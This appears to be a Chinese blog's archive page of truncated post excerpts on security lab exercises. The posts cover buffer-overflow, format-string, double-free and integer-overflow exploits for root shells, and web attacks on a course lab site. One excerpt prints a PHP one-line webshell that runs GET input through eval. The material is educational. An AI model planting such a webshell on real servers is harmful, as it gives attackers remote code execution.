05 2020 档案
摘要:一 概述 本地 kail linux 目标 windows nt 服务器 二 过程 首先编写一句话木马 index.php 一句话木马的原理就是把C=xxx 字符串当成php语句执行 注意这里用了GET,因为尝试过POST不成功 <?php eval(@$_GET['c']);?> 编写 上传脚本
阅读全文
摘要:实验环境、代码、及准备 https://www.cnblogs.com/lqerio/p/12870834.html vul6 Vul6和vul2类似,可以覆盖foo的ebp的一字节。而这里有一个exit(0),需要绕过。绕过思路见3.6exploit6 shellcode(构造过程) 原理是运行/
阅读全文
摘要:实验环境、代码、及准备 https://www.cnblogs.com/lqerio/p/12870834.html vul5 Snprintf函数,百度百科: 将可变个参数(...)按照format格式化成字符串,然后将其复制到str中。 (1) 如果格式化后的字符串长度 < size,则将此字符
阅读全文
摘要:实验环境、代码、及准备 https://www.cnblogs.com/lqerio/p/12870834.html vul4 观察foo函数,可见问题在于最后一次tfree(q)。由于之前已经tfree了q,现在相当于tfree一个不存在的空间,导致出错。 再看自定义的函数 CHUNK结构体占8个
阅读全文
摘要:实验环境、代码、及准备 https://www.cnblogs.com/lqerio/p/12870834.html vul2 下面只给出有漏洞部分的代码。Vul2问题为sizeof函数在计算时会考虑最后的/0占一字节而strlen不会,同时for循环中用的是i<=,导致虽然nstrcpy函数做了l
阅读全文
摘要:实验环境、代码、及准备 https://www.cnblogs.com/lqerio/p/12870834.html vul3 分析Vul3可知输入为整数count和字符串in。vul3中使用if判断来防溢出,问题在于一个足够小点负数可以满足 if 的条件进入memcpy函数,而负数*sizeof(
阅读全文
摘要:实验代码 https://github.com/TouwaErioH/security/tree/master/stack%20overflow 实验目的 Buffer over flow 漏洞利用实践 实验内容 编写exploits攻击漏洞程序 实验结果 获取具有root权限的shell 实验环境
阅读全文
摘要:参考 http://gorails.com/setup/ubuntu/16.04 概述 Project 2 主要探究对web的攻击,本次试验共有6个部分。 Project 2中攻击的是一个提供电子货币服务网站--bitbar(使用ruby 2.4和rails 5.0.2实现)。 bitbar网站的搭
阅读全文